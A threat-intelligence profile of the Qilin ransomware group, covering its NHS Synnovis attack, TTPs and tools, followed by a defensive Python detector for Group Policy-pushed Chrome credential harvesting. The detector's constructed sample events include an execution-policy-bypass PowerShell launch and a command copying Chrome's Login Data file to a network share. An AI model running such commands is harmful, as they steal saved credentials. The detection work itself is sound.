Background
Qilin, also known as Agenda, is a Russian-speaking ransomware-as-a-service operation that emerged in mid-2022. The group develops ransomware in both Rust and Go, targeting Windows and Linux/VMware ESXi systems. Qilin has steadily grown in prominence and was responsible for one of 2024's most impactful healthcare attacks.
Notable Campaigns
NHS Synnovis Attack (June 2024): Qilin attacked Synnovis, a pathology services provider for major London NHS hospitals including King's College Hospital and Guy's and St Thomas'. The attack disrupted blood transfusion services and forced cancellation of thousands of medical appointments and surgeries, representing one of the most impactful healthcare ransomware incidents in UK history.
Chrome Credential Harvesting (2024): Sophos documented Qilin affiliates deploying a novel technique: using Group Policy to push a script that harvested saved credentials from Google Chrome browsers across all machines in the domain before encrypting systems, dramatically expanding the impact of each intrusion.
Tactics, Techniques & Procedures
Qilin affiliates gain access through compromised VPN credentials (often lacking MFA), phishing, and exploitation of internet-facing applications. The group uses Cobalt Strike for post-exploitation and deploys SystemBC for SOCKS5 proxy tunneling.
A distinctive innovation is the Chrome credential harvesting technique: deploying scripts via Group Policy that extract saved passwords from all domain-joined machines, collecting credentials for SaaS applications, banking, and email that extend impact far beyond the encrypted network.
Tools & Malware
Qilin Ransomware: Cross-platform encryptor written in Rust (Windows) and Go (Linux). Targets VMware ESXi virtual infrastructure and supports configurable encryption parameters.
Chrome Credential Harvester: PowerShell script deployed via GPO that extracts saved credentials from Chrome's SQLite database across all domain computers.
Indicators & Detection
Implement MFA on all VPN and remote access points. Monitor for Group Policy modifications that deploy scripts to workstations, particularly scripts that read Chrome user data directories. Watch for SystemBC proxy tunneling and Rclone data exfiltration.
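An added detection example for the Chrome credential harvesting technique described in the Tools and Detection sections; this is illustrative code written for this page, not Sophos's or any vendor's detection content. It assumes process-creation telemetry shaped like Sysmon Event ID 1 (ProcessId, ParentProcessId, Image, ParentImage, CommandLine) and flags a process that references Chrome's Login Data store when its ancestry traces back to a Group Policy-launched script; the sample events, host and share names are constructed.

```python
"""Flag processes that touch Chrome's saved-credential store (Login Data) and descend
from a Group Policy script, the footprint the GPO-pushed harvester leaves behind.
Assumed input: Sysmon Event ID 1 style dicts. Sample events below are constructed."""
import re

CHROME_LOGIN_DATA = re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\Login Data", re.I)
GPSCRIPT = re.compile(r"\\gpscript\.exe$", re.I)    # Windows Group Policy script engine
SYSVOL = re.compile(r"\\\\[^\\]+\\SYSVOL\\", re.I)  # domain share GPO scripts are run from


def gpo_origin(event, by_pid, max_depth=5):
    """Walk the parent chain; return the ancestor launched by Group Policy, or None."""
    cur = event
    for _ in range(max_depth):
        if GPSCRIPT.search(cur.get("Image", "")) or SYSVOL.search(cur.get("CommandLine", "")):
            return cur
        cur = by_pid.get(cur.get("ParentProcessId"))
        if cur is None:
            return None
    return None


def find_gpo_credential_harvesting(events):
    """Return (offending event, GPO ancestor) pairs. A process that reads Login Data
    without GPO ancestry (backup tools, the user's own browser) is not reported."""
    by_pid = {e["ProcessId"]: e for e in events}
    hits = []
    for e in events:
        if CHROME_LOGIN_DATA.search(e.get("CommandLine", "")):
            origin = gpo_origin(e, by_pid)
            if origin is not None:
                hits.append((e, origin))
    return hits


# Constructed sample chain: gpscript.exe -> powershell.exe (SYSVOL script) -> cmd copy
SAMPLE_EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 4, "Image": r"C:\Windows\System32\gpscript.exe",
     "CommandLine": "gpscript.exe /Startup"},
    {"ProcessId": 200, "ParentProcessId": 100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File \\corp.example\SYSVOL\corp.example\scripts\collect.ps1"},
    {"ProcessId": 300, "ParentProcessId": 200, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c copy "C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data" \\corp.example\share\alice.db'},
    # Benign control: a local backup tool touching the same file with no GPO ancestry
    {"ProcessId": 400, "ParentProcessId": 50, "Image": r"C:\Program Files\Backup\backup.exe",
     "CommandLine": r'backup.exe "C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data"'},
]
```

Running `find_gpo_credential_harvesting(SAMPLE_EVENTS)` reports only the cmd.exe copy (PID 300) with its SYSVOL-hosted PowerShell ancestor (PID 200); the backup tool is ignored because its parent chain never reaches a Group Policy origin.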